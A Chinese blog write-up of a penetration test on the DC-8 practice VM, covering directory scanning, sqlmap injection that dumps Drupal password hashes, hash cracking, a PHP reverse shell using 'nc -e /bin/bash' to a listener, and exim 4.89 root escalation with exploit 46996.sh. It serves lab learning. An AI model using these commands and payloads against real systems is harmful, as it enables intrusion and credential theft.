Fork me on GitHub

DC8靶机渗透记录

字数统计: 1k字   |   阅读时长≈ 4分
DC8靶机渗透记录

信息收集

直接上结果

image-20210227115537834

192.168.8.120为VM平台,也即目标靶机,本机ip182.168.8.121

image-20210227121043178

经典22,80端口,apache服务

image-20210227121137096

drupal的CMS,目录扫描部分结果如下

1
2
3
4
5
6
7
8
9
10
11
12
13
[12:13:08] 200 -    3KB - /install.php 
[12:13:10] 301 -  234B  - /misc  ->  http://192.168.8.120/misc/
[12:13:10] 301 -  237B  - /modules  ->  http://192.168.8.120/modules/                  
[12:13:11] 200 -    7KB - /node                                                                        [12:13:13] 301 -  238B  - /profiles  ->  http://192.168.8.120/profiles/
[12:13:14] 200 -    2KB - /robots.txt
[12:13:14] 301 -  237B  - /scripts  ->  http://192.168.8.120/scripts/
[12:13:15] 301 -  235B  - /sites  ->  http://192.168.8.120/sites/         
[12:13:17] 301 -  236B  - /themes  ->  http://192.168.8.120/themes/  
[12:13:18] 200 -    8KB - /user         
[12:13:18] 200 -    8KB - /user/login/
[12:13:18] 200 -    8KB - /user/       
[12:13:18] 200 -    2KB - /web.config
[12:13:19] 200 -   42B  - /xmlrpc.php

先康康robots.txt文件

image-20210227122359070

挺好的,还出来了登录页面/user/login,其他的没权限康

寻找利用点

这时候注意到一个小细节

image-20210227122542823

首页的Details点开会传GET参数nid,随手试了试/?nid=1'发现回传页面不一样!

image-20210227122659122

SQL注入!终于刷到了QAQ

这里图省事,sqlmap跑一波,先爆出数据库名儿(吐槽一下这不是dc8吗为啥要叫d7)

1
sqlmap python3 -u <url>/?nid=1 --dbs
  1. sqlmap python3 sqlmap.py -u /?id=1 –dbs 查询数据库的库名
  2. sqlmap python3 sqlmap.py -u -D 数据库名 –tables 查询数据库的表名
  3. sqlmap python3 sqlmap.py -u -D 数据库名 -T 表名 –column 查找字段
  4. sqlmap python3 sqlmap.py -u -D 数据库名 -T 表名 -C flag –dump 可显示flag

image-20210227123327238

这两个数据库都分别进行查询其中在d7db库中发现了users的表,展开发现结果如下

image-20210227124102705

1
sqlmap python3 -u <url>/?nid=1 -D d7db -T users -C name,pass --dump

image-20210227124350621

好家伙,,,爆是爆出来了,但是$S$说明它用的是自己定义脚本进行的hash转换。。。也就是说我们仅仅知道了用户名儿

name password
admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

那现在就有俩思路

  1. 直接去web爆破admin和john的账号密码
  2. 使用john the rapper进行爆破这个哈希值

image-20210227133122901

john the rapper解出来了john的密码john:turtle

hydra爆破也走了一波,,,哪怕我开了12线程,用kali自带rockyou.txt也非常慢,,,

所以直接走登录吧

image-20210227140123740

漏洞利用

登录上去后,发现contact us的页面是可以修改编辑的,自然想到使用php格式写入一句话木马连webshell

image-20210227141301381

因为上传之后没有上传的地址,所以webshell先暂时搁置

这里需要用户再次提交信息,才能触发php代码

那换一种方式

直接反弹shell

1
2
3
<?php
system("nc -e /bin/bash 192.168.8.120 7777");
 ?>

image-20210227142557185

OK,有了!

本地提权

先检查SUID,确实有几个可以思考的方向,先码着

image-20210227143319450

在输入sudo -l,康康www-data有哪些无密码的root权限,发现并没有,但这算提示吗,虽然我看不懂

image-20210227143619470

先试试exim4吧,46996.sh这个脚本

1
exim4 --version

image-20210227143916923

诶,4.89好像符合诶

直接nc上传文件,同样还是在/tmp文件夹下,因为该文件夹权限较大

1
2
3
4
#kali
nc -lnvp 1234 < 46996.sh
#靶机
nc 192.168.8.121 1234 > 46996.sh

chmod +x 46996.sh给权限,留待使用

这个地方直接在/tmp文件下运行脚本会显示一个很奇怪的错误,这里参考了eson的文章:

exp的文本格式是 dos文件的格式 然后linux的格式是不能跑的

因为dos格式编写的是 CRLF 而mac是CR unix是LF

所以多出来的CR \r会导致命令执行错误 并且 在检查文件的时候 并不会看到 (这种字符是不可见的非打印字符)

解决方法是

1
sed -i 's/\r//' 46996.sh

之后再使用netcat方式提权

1
bash 46996.sh -m netcat

image-20210227150359640

getshell!

image-20210227150551740

尾声

之后我测试了一下一句话,确实不是/node/3/done这个位置,也就是说,没有上传的位置,就无法连接webshell。

OK,DC系列应该只剩下一个DC-9了,加油ヾ(◍°∇°◍)ノ゙

谢谢你请我吃糖果

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

CTFer, Hacker, Developer of computer science